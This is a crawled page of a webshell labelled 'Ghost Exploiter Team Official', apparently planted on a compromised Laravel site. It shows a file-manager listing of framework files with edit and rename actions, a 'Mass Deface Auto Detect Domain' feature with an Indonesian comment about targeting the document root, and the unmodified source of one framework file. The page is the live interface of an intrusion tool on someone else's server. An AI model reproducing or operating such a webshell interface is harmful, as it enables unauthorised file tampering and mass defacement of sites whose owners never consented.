webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Foundation
/
Events
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
DiscoverEvents.php
3.368KB
edt
ren
Dispatchable.php
1.207KB
edt
ren
LocaleUpdated.php
0.346KB
edt
ren
MaintenanceModeDisabled
...
0.087KB
edt
ren
MaintenanceModeEnabled.php
0.086KB
edt
ren
PublishingStubs.php
0.645KB
edt
ren
VendorTagPublished.php
0.531KB
edt
ren
<?php namespace Illuminate\Foundation\Events; class PublishingStubs { use Dispatchable; /** * The stubs being published. * * @var array */ public $stubs = []; /** * Create a new event instance. * * @param array $stubs * @return void */ public function __construct(array $stubs) { $this->stubs = $stubs; } /** * Add a new stub to be published. * * @param string $path * @param string $name * @return $this */ public function add(string $path, string $name) { $this->stubs[$path] = $name; return $this; } }
<=Back
Liking